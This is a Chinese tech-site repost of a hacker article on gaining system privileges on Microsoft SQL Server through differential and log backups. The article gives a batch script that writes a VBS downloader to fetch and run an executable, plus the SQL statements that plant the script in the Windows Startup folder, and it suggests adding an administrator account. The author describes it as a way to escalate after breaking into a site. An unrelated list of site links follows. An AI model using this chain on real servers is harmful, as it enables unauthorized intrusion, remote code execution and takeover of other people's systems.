位置: 编程技术 - 正文

MSSQL差异备份取系统权限的相关软件下载(sql差异备份数据库怎么还原)

编辑:rootadmin
昨天在网上找资料的时间无意进了一个站,糊里糊涂就进去了,想提权提不起来,后来加上服务商的Q号想社工一下,射了半天得知服务器的安全是绿盟的人给做的 安全,后来就问猪猪有什么提权的方法没,他刚好做了这个动画就给发来过来,在网上查了一下找到了文章,一起拷贝过来.最近忙着学习很少关注这方面的东西, 落后了,落后了...... 下面是是在网上找到的资料和动画. TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧! MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码 让系统执行了之后自动提升权限 或者添加管理员吗? 答案当然可以了,kj测试了N次之后跟你说! 那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是废话吧! 大家不用想都知道 通用地方 C:Documents and SettingsAll Users「开始」菜单程序启动 呵呵位置有了! 那么我们备份什么文件让系统能执行的呢? 这个是第一个关键点~! EXE JS VBS BAT这些文件大家第一时间想到的了 那些我一个一个来分析 exe的话!绝对能了! 但是 MSSQL差异备份这么多垃圾肯定会把exe弄坏的! 否决掉 然后到脚本 VBS 我们能不能把 他的垃圾信息注释掉呢? 不然VBS 会执行不了! OK 学过VBS的朋友都知道 VBS里面 有2种注释 ' 还有就是 rem 但是还是会有垃圾信息屏蔽不了 否决掉 JS呢? JS里面有多行注释的/**/ 但是 /* 不可能在首行吧? 否决掉 最后 剩下我们最熟悉的bat批处理了! OK我们继续分析 bat里面注释是什么呢?也是REM,失败啊!之前vbs那里不行 这里的rem注释也一样不行的! 那么我们怎么办呢?其实很简单! 当我们在CMD下面敲错了命令系统会怎样呢? 说到这里 要是大家不往文章下面看也一样能想到方法了吧~ OK我们继续探~~这里是最最关键点,差异备份出来的垃圾信息我们可以通过用回车把他提交了! 而系统只当作无用的命令来处理!不影响我们的操作! 问题就这样解决了吗?不是的!~MSSQL备份的时候,到一定的字符长度就会出现垃圾的字符,那个字符会影响我们的操作! 那么我们得把语句尽量缩少,越少越好~ OK那我们思路好了就采用bat 写一个VBS的下载者 然后执行这个下载者 最后通过下载者down回来的马子来获取系统权限 下面是我改过的生成下载者的BAT echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs echo P.Open "GET"," >>k.vbs echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs echo G.Mode=3:G.Type=1:G.Open() >>k.vbs echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs k.vbs t 下一个k.VBS然后k.vbs下载一个t.exe文件保存到本地 直接执行 记得记得我说过的代码前面一定要用回车把垃圾数据提交 最好2以上个回车 然后实现差异备份 alter database ISTO set RECOVERY FULL-- create table cmd (a image)-- backup log ISTO to disk = 'c:cmd1' with init-- insert into cmd (a) values (0xA0D0AFDFAD 6FFED4CE6B2ED0AFE4FE2 CA2F2FEF2EE2FEC E3E6B2ED0AFEEAD FAFEDE3E6B2ED0A FE4D6FDAEDAE4FEE3E6B 2ED0AFEEF6EF AEFCECE3E6B2ED0A 6B2ED0AD0A)-- backup log ISTO to disk = 'C:Documents and SettingsAll Users「开始」菜单程序启动1.bat'-- drop table cmd-- OK bat出来了! 至于怎样让服务器重启呢!这个问题遗留给你们去讨论吧! 要是服务器直接开启了 那就更方便了! 直接bat 一个添加管理员的命令更爽! isto是动画里用到的工具. isto辅助转换工具.rarmssql差异备份取系统权限.rar

推荐整理分享MSSQL差异备份取系统权限的相关软件下载(sql差异备份数据库怎么还原),希望有所帮助,仅作参考,欢迎阅读内容。

MSSQL差异备份取系统权限的相关软件下载(sql差异备份数据库怎么还原)

文章相关热门搜索词:sql数据库差异备份,mssql备份数据库,sqlserver 差异备份,sql差异备份语句,数据库差异备份,sql差异备份语句,sql差异备份语句,sqlserver 差异备份,内容如对您有帮助,希望把文章链接给更多的朋友!

解决MSSQL远程连接sql非默认端口数据库的问题 SQL没有像SQL一样的客户端网络实用工具,基本上SQL算是把SQL里面的名字都改了,在网上找资料也没找到,只能一点点的试,终于发现了一个

SQL命令大全-中英文对照第1/3页 SQL命令大全-中英文对照--语句功能--数据操作SELECT--从数据库表中检索数据行和列INSERT--向数据库表添加新数据行DELETE--从数据库表中删除数据行UPDATE--更

用SQL语句实现随机查询数据并不显示错误数据的方法 问题:上级单位要来检查数据,我的服务器的数据库是SQLserver,上级单位要求我用SQL语句在服务器端随机查询条数据出来。可是我的服务器里有些错

标签: sql差异备份数据库怎么还原

本文链接地址:https://www.jiuchutong.com/biancheng/348435.html 转载请保留说明!

上一篇:SQL Server 不删除信息重新恢复自动编号列的序号的方法(sqlserver完全删除)

下一篇:解决MSSQL2005远程连接sql2000非默认端口数据库的问题(sql2008开启远程连接)

  • 多交了企业所得税,下年度退税,需要更正撒意思
  • 停车位划线套什么定额
  • 定额备用金与非定额备用金的会计分录
  • 交易性金融资产和其他权益工具投资的区别
  • 税控盘和税控钥匙一样吗
  • 10万以内免交的增值税怎么做帐
  • 发票与入库单明细不一致税务可以吗
  • 转让企业全部产权属于增值税征税范围。A对B错
  • 哪些产品计算消费税时可以扣除
  • 红字发票是否要修改往期申报表
  • 银联交易手续费
  • 所得税汇算期间费用填列说明
  • 个人取得的拆迁款需要缴纳个人所得税吗
  • 不能取得进项发票但结转成本,税务说明怎么写
  • 如何查询以前申诉进度
  • 软件服务费是什么
  • 没有及时去做财务会计制度备案怎么办?
  • 公司聚餐计入福利费还是招待费
  • 计提房租的原始凭证包括
  • 非流动负债怎么巧记
  • 审计报告与汇缴报告
  • 公司亏损应该从哪入手
  • 主体有哪些
  • mac升级系统还剩不到一分钟
  • 本月未抵扣完的进项税是否转出
  • 生产物料报废
  • 企业将自有房产怎么处理
  • php取二维数组的一组内容
  • 先收票后收货
  • ln s命令
  • 回购证券标的
  • 增值税普通发票和电子普通发票的区别
  • mysql外键约束的基本语法结构
  • js函数声明的提出者
  • rhel6安装教程
  • 11-ElementUI
  • 母公司给子公司借款要利息吗
  • 施工现场补助规定
  • 如何理解合并报表抵消分录
  • 购买的固定资产退回账务处理
  • 现金流量表两年数据分析
  • 固定资产盘亏盘盈
  • 建筑劳务公司工作内容
  • 扫码开票软件
  • 研发费用 汇算清缴
  • 跨月冲红的发票怎么做会计分录
  • 收到公益性捐赠计入什么科目
  • 专项费用会计分录
  • 资产负债表中各项目的期末余额
  • 电子发票开具流程?
  • 银行卡账户年费
  • c++ 虚数
  • sqlserver 中文字符集
  • sql server数据库正在恢复
  • mysql存储过程菜鸟教程
  • vmware安装centos7超详细过程 图文
  • win7系统硬盘分区类型
  • win7系统自动更新在哪里关闭啊
  • linux进程和线程底层实现原理一样吗
  • win7桌面右下角输入法图标不见了
  • linux双网卡双ip配置
  • win10无法使用内置管理员账户
  • 怎么在手机上买股票开户
  • win10预览版21277下载
  • 在linux系统中,用来存在系统所需
  • android app 源码
  • windows下用CMD调用COM口
  • android base64传图片
  • cocos2dx openGL
  • shell脚本运行linux命令
  • jquery中判断某个类是否存在的方法
  • windows捕获文件夹
  • jquery :not
  • 票据代码和票据号码是什么意思
  • 国家税务总局党建工作局
  • 央企收入归谁
  • 深圳市电价价目表详解
  • 广东为什么用粤做简称?
  • 补交以前年度城建税费怎么做账
  • 混凝土搅拌站如何结转成本
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设